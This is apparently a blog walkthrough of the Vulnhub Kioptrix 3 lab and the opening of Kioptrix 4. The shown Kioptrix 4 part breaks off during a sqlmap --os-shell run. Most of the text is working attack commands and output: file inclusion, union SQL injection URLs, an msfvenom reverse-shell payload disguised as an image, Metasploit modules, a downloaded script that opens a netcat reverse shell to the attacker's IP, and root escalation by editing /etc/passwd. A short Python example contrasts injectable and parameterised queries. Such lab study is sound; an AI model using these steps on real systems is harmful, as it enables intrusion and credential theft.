lang="">root@kali:~# netdiscover Currently scanning: 192.168.194.0/16 | Screen View: Unique Hosts 13 Captured ARP Req/Rep packets, from 4 hosts. Total size: 780 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.43.1 ac:c1:ee:31:3f:25 6 360 Xiaomi Communications Co Ltd 192.168.43.33 44:03:2c:68:d8:0f 2 120 Intel Corporate 192.168.43.58 00:0c:29:b2:76:40 4 240 VMware, Inc. 192.168.43.158 00:0c:29:38:2d:6f 1 60 VMware, Inc. 
</pre><p>The target IP is <code>192.168.43.158</code>.</p><p>Scan the target host's ports with nmap.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT Nmap scan report for 192.168.43.158 Host is up (0.00053s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:38:2D:6F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.53 ms 192.168.43.158 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds </pre><p>From the scan:</p><ul><li>22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>Port 80 shows that the CMS is <code>Lotus CMS</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>Scan the site's directories with <code>dirb</code> (御劍 can also be used). A <code>phpmyadmin</code> directory is found</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>CMS admin panel: <code>http://192.168.43.158/index.php?system=Admin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10220' class='md-header-anchor '></a>File inclusion &amp; admin upload</h3><p>Visit the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The URL looks suspicious</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>Try <code>system=../../../../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>That does not seem to work; with a <code>%00.</code> null-byte truncation, however, <code>/etc/passwd</code> can be read</p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the admin password later recovered with SQLmap, this yields a shell.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 1114 bytes 
</pre><p>Generate an image-disguised payload with <code>msfvenom</code></p><p>Upload it where the admin panel accepts image uploads</p><p>Edit an existing image and note the name the upload is given,</p><p>Start a listener in msf</p><p>Use the file inclusion to include the uploaded image. This step is somewhat awkward, because the absolute path cannot be obtained directly.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00. </pre><p>Requesting it returns a shell.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 192.168.43.177 LHOST => 192.168.43.177 msf exploit(multi/handler) > set LPORT 443 LPORT => 443 msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.43.177:443 [*] Sending stage (37775 bytes) to 192.168.43.158 [*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400 meterpreter > ls Listing: /home/www/kioptrix3.com ================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 4096 dir 2011-04-15 09:21:17 -0400 cache 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 core 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 data 100644/rw-r--r-- 23126 fil 2011-04-14 12:23:13 -0400 favicon.ico 40755/rwxr-xr-x 4096 dir 2011-04-14 11:32:31 -0400 gallery 100644/rw-r--r-- 26430 fil 2011-04-14 12:23:13 -0400 gnu-lgpl.txt 100644/rw-r--r-- 399 fil 2011-04-14 12:23:13 -0400 index.php 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 modules 40777/rwxrwxrwx 4096 dir 2011-04-14 12:24:17 -0400 style 100644/rw-r--r-- 243 fil 2011-04-14 12:23:13 -0400 update.php </pre><p>The privileges are low; many commands cannot be run.</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQL injection with SQLmap</h3><p>Some of the site's links are broken: they 302-redirect to <code>kioptrix3.com</code></p><p>Add the following to <code>/etc/hosts</code></p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158 kioptrix3.com </pre><p><code>service networking 
restart</code> restarts networking</p><p>The URL <code>kioptrix3.com/gallery/gallery.php?id=1&amp;sort=photoid#photos</code> is SQL-injectable.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Test with <code>sqlmap</code> first: the id parameter has an error-based injection.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>Try to find the admin account and password.</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery Table: dev_accounts [2 entries] +----+------------+---------------------------------------------+ | id | username | password | +----+------------+---------------------------------------------+ | 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | | 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | +----+------------+---------------------------------------------+ </pre><p>This gives the admin credentials, but at</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>they cannot log in. Another login page is found at <code>http://kioptrix3.com/gallery/gadmin/</code></p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery Table: gallarific_users [2 entries] +----------+----------+ | username | password | +----------+----------+ | admin | n0t7t1k4 | +----------+----------+ </pre><p>and these credentials do log in there.</p><p>Although we have <code>root</code> and <code>dba</code> privileges on the database here, without the absolute path sqlmap cannot be used to write a shell directly.</p><h3><a name='header-n10291' class='md-header-anchor '></a>Manual SQLi</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6# </pre><p>Determine that there are 6 columns</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6# </pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>This gives the current database and version</p><pre class="md-fences mock-cm md-end-block" 
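lang="" style="display:none"></pre><p>The union queries above and below work because <code>gallery.php</code> pastes the <code>id</code> parameter straight into the SQL text, so a value that is not a number is still executed. The following is an added example written for this page, not the gallery application's code: it rebuilds that query pattern over an in-memory SQLite database (the table and column names are assumed; the two <code>dev_accounts</code> rows reuse the hashes shown in the sqlmap output) and runs the page's union payload against the vulnerable form and against a parameterised form. SQLite spells string concatenation as <code>||</code>, so the payload uses that instead of MySQL's <code>0x3a</code>.</p>

```python
import sqlite3

# The page's dev_accounts dump, loaded into constructed tables for the demo.
SCHEMA = """
CREATE TABLE gallery_photos (photoid INTEGER, title TEXT, filename TEXT,
                             catid INTEGER, views INTEGER, votes INTEGER);
INSERT INTO gallery_photos VALUES (1, 'Goat', 'goat.jpg', 1, 10, 2);
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
"""

# The page's final union payload, in SQLite syntax (constructed).
PAYLOAD = ("1 union select 1,group_concat(username||':'||password),3,4,5,6 "
           "from dev_accounts")


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def photo_vulnerable(conn, id_param):
    """The gallery.php pattern: the raw request value becomes part of the SQL."""
    sql = ("SELECT photoid,title,filename,catid,views,votes FROM gallery_photos "
           f"WHERE photoid={id_param}")
    return conn.execute(sql).fetchall()


def photo_safe(conn, id_param):
    """Hardened form: validate the type, then bind the value as a parameter
    so it can never be interpreted as SQL."""
    try:
        photo_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = ("SELECT photoid,title,filename,catid,views,votes FROM gallery_photos "
           "WHERE photoid=?")
    return conn.execute(sql, (photo_id,)).fetchall()


def leaked_credentials(rows):
    """Pull the group_concat'd user:hash pairs out of a union result, if any."""
    leaked = set()
    for row in rows:
        if isinstance(row[1], str) and ":" in row[1]:
            leaked.update(row[1].split(","))
    return leaked


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", leaked_credentials(photo_vulnerable(db, PAYLOAD)))
    print("safe, id=1:", photo_safe(db, "1"))
    try:
        photo_safe(db, PAYLOAD)
    except ValueError as err:
        print("safe, payload:", err)
```

<p>The vulnerable function returns the legitimate photo row plus a second row whose title column carries both dev_accounts hashes, which is exactly what the screenshots above show in the browser; the parameterised function returns the photo for <code>1</code> and rejects the payload before any SQL runs. Integer validation alone is not the fix (a text column would still need binding); the bind parameter is, and the type check merely gives a cleaner error.</p><pre class="md-fences mock-cm md-end-block" 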
lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()# </pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>得到當前數據庫所有的表名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473# </pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>獲取表里的列名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts# </pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS 漏洞</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS ------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------- ---------------------------------------- Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py Lotus Core CMS 1.0.1 - Remote File Inclusion | exploits/php/webapps/5866.txt LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt ------------------------------------------------------- ---------------------------------------- Shellcodes: No Result </pre><p>從查詢結果看,有一個本地文件包含和一個遠程代碼執行,</p><p>這里的本地文件包含就是我們之前發現的那個。我們嘗試下這個本地文件包含漏洞</p><p>嘗試發現這個漏洞好像不行。</p><p>嘗試<code>LotusCMS 3.0 - 'eval()' Remote Command 
Execution</code>, which turns out to be an rb file.</p><p>So</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/lcms_php_exec 2011-03-03 excellent LotusCMS 3.0 eval() Remote Command Execution </pre><p>Use this module to attack</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec msf exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI /lcms/ yes URI VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58 RHOST => 192.168.43.58 msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp PAYLOAD => generic/shell_bind_tcp msf exploit(multi/http/lcms_php_exec) > set URI / URi => / msf exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOST 192.168.43.58 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI / yes URI VHOST no HTTP server virtual host Payload options (generic/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.43.58 no The target address Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf exploit(multi/http/lcms_php_exec) > run [*] Started bind handler [-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable. [*] Exploit completed, but no session was created. msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158 RHOST => 192.168.43.158 msf exploit(multi/http/lcms_php_exec) > run [*] Started bind handler [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400 whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) ls cache core data favicon.ico gallery gnu-lgpl.txt index.php modules style update.php pwd /home/www/kioptrix3.com </pre><p>我嘗試用<code>cd</code>命令進入<code>gallery</code>目錄但是不行,</p><p>這里用到<code>ls -l</code>可以看到<code>gallery</code>目錄的文件</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery total 156 drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK -rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql -rw-r--r-- 1 root root 252 Apr 12 2011 g.php drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin -rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php -rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php -rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php -rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php -rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php -rw-r--r-- 1 root root 249 Apr 12 2011 index.php -rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK -rw-r--r-- 1 root root 212 Apr 12 
2011 login.php -rw-r--r-- 1 root root 213 Apr 12 2011 logout.php -rw-r--r-- 1 root root 249 Apr 12 2011 p.php drwxrwxrwx 2 root root 4096 Apr 12 2011 photos -rw-r--r-- 1 root root 213 Apr 12 2011 photos.php -rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php -rw-r--r-- 1 root root 214 Apr 12 2011 profile.php -rw-r--r-- 1 root root 87 Oct 10 2009 readme.html -rw-r--r-- 1 root root 213 Apr 12 2011 recent.php -rw-r--r-- 1 root root 215 Apr 12 2011 register.php drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin -rw-r--r-- 1 root root 213 Apr 12 2011 search.php -rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php -rw-r--r-- 1 root root 211 Apr 12 2011 tags.php drwxr-xr-x 6 root root 4096 Apr 12 2011 themes -rw-r--r-- 1 root root 56 Oct 10 2009 version.txt -rw-r--r-- 1 root root 211 Apr 12 2011 vote.php </pre><p>發現<code>gconfig.php</code>配置文件,<code>cat</code>讀配置文件。</p><pre class="md-fences mock-cm md-end-block" lang=""> $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; $GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou"; </pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh </pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh root@kali:~# ./lotusRCE.sh 192.168.43.158 Path found, now to check for vuln.... </html>Hood3dRob1n Regex found, site is vulnerable to PHP Code Injection! About to try and inject reverse shell.... what IP to use? 192.168.43.177 What PORT? 2333 OK, open your local listener and choose the method for back connect: 1) NetCat -e 3) NetCat Backpipe 5) Exit 2) NetCat /dev/tcp 4) NetCat FIFO #? 
1
</pre><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>Privilege escalation</h2><p>Try the credentials obtained earlier through the SQL injection:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>Logging in over SSH, the first account is not of much use; it cannot escalate privileges.</p><p>Connect with the second account:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>There is a <code>CompanyPolicy.README</code> file.</p><pre class="md-fences mock-cm md-end-block" lang="">checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
</pre><p>My English is poor; according to Baidu Translate, it says files can be edited and created with <code>sudo ht</code>.</p><p>Trying it from Kali:</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p>It errors out: it cannot open an <code>xterm-256color</code> terminal.</p><p>Going back to the local environment and connecting with <code>xshell</code>, it opens fine.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>Now press <code>F3</code> and enter <code>/etc/passwd</code> or <code>/etc/sudoers</code> to open the file for editing.</p><p>Change the current user's entry in <code>/etc/passwd</code> so it has the same privileges as <code>root</code>. <img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>Alternatively, give the current user the same privileges as <code>root</code> in <code>/etc/sudoers</code>. <img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>Log in again over SSH.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May 8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
</pre><p>We now have <code>root</code> privileges.</p><h2><a name='header-n10381' class='md-header-anchor '></a>Summary</h2><p>This exercise was quite long and turned up problems in many places. First, I found <code>phpmyadmin</code> and tried the log-writing method to see whether I could get a shell, but the <code>general log</code> variable does not exist among the variables shown in <code>phpmyadmin</code>.</p><p>There is also the SQL injection, which <code>sqlmap</code> can exploit, running as <code>root</code>. I tried writing a shell with <code>os-shell</code>, using the absolute path obtained earlier through the remote command execution, but it still could not be written. It seems to be a directory permission problem.</p><p><code>INTO OUTFILE</code> cannot be executed from <code>phpmyadmin</code> either; it shows <code>#1 - Can't create/write to file</code>. The command execution also shows that the directory is not writable.</p><p>Finally I added an exploit combining file inclusion with an upload in the admin backend: the file inclusion executes an image-embedded webshell and yields a shell. Although it is of limited use, it still feels rather impressive.</p><p>During the exercise I wanted to try many different methods, but the lab environment is limited. Still, I learned a lot; after several <code>vulnhub</code> exercises, I feel I have learned a great deal about privilege escalation in particular.</p><p>Although these environments are somewhat unusual, even odd, I still picked up knowledge of the <code>linux</code> environment that I had previously lacked.</p><h1><a name='header-n10396' class='md-header-anchor '></a>Section 16: Vulnhub Penetration Testing Practice - Kioptrix 4</h1><hr /><p>title: Vulnhub Penetration Testing Practice - Kioptrix 4 date: 2018-05-17 13:46:30 tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>Author: Ukonw</h2><h3><a name='header-n10405' class='md-header-anchor '></a>Information gathering</h3><p>Port scan with <code>nmap</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>The scan shows the following open ports:</p><ul><li>22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</li><li>445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>Visit the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>Trying the universal-password bypass <code>'or 1=1#</code> fails.</p><p>The weak credential <code>admin:admin</code> is also wrong.</p><p>Trying <code>admin:'</code> produces an error, which also discloses the path <code>/var/www/checklogin.php</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a POST-based SQL injection.</p><h2><a name='header-n10433' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10434' class='md-header-anchor '></a>SQL injection with sqlmap</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>During the injection sqlmap asks about the <code>302 redirect</code>; choose <code>n</code>.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database: 'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA: True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'

[*] shutting down at 02:00:45
</pre><p>The injection yields the usernames and passwords:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
</pre><p>Use <code>--os-shell</code> to write a <code>webshell</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:06

[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
